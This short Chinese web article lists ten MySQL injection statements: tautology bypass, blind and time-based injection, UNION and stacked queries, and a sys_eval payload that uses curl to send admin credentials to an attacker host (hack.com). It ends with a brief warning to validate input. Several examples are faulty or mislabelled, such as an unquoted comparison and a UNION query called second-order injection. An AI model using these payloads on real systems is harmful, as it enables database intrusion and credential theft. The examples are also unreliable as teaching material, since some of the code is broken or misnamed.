MySQL數據庫注入是指攻擊者試圖通過構造惡意SQL語句,利用系統漏洞從而實現非法的數據庫操作的一種攻擊方式。以下是一些常見的MySQL數據庫注入語句:
1. 基礎語句 SELECT * FROM users WHERE username = 'admin' AND password = '123456'; 2. 基本SQL注入操作 SELECT * FROM users WHERE username = 'admin' AND password = '1' OR 1=1; 3. 常見的盲注語句 SELECT * FROM users WHERE id=1 and substring(database(),1,1)='t'; SELECT * FROM users WHERE id=1 and length(database())=8; 4. 數字型盲注語句 SELECT * FROM users WHERE id=1 and (select mid(database(),1,1)>t); 5. 字符串型盲注語句 SELECT * FROM users WHERE username = 'admin'/**/and/**/(ascii(mid(database(),1,1)))>105; 6. 利用 SQL UNION 實現的二次注入 SELECT * FROM users WHERE username='admin' AND password='123456' UNION SELECT 0,1 FROM admin; 7. 利用子查詢漏洞實現的注入 SELECT * FROM users WHERE id=1 and (select count(*) from information_schema.tables) >1; 8. 利用 sleep() 函數進行盲注 SELECT * FROM users WHERE username='admin' AND sleep(5); 9. 利用堆疊注入實現的注入 SELECT * FROM users WHERE username = 'admin' AND password = '123456'; SELECT * FROM users WHERE username = 'admin'; 10. 利用表達式求值漏洞實現的注入 SELECT * FROM users WHERE id=1 and sys_eval('curl -d "username=admin&password=123456" http://hack.com/get.php')==1;
這些注入語句雖然看起來比較簡單,但卻可能給系統帶來巨大的安全隱患,因此在編程的過程中一定要對輸入的數據進行充分的過濾和驗證,否則就有可能造成數據庫被入侵的風險。
下一篇css圖片緩慢顯示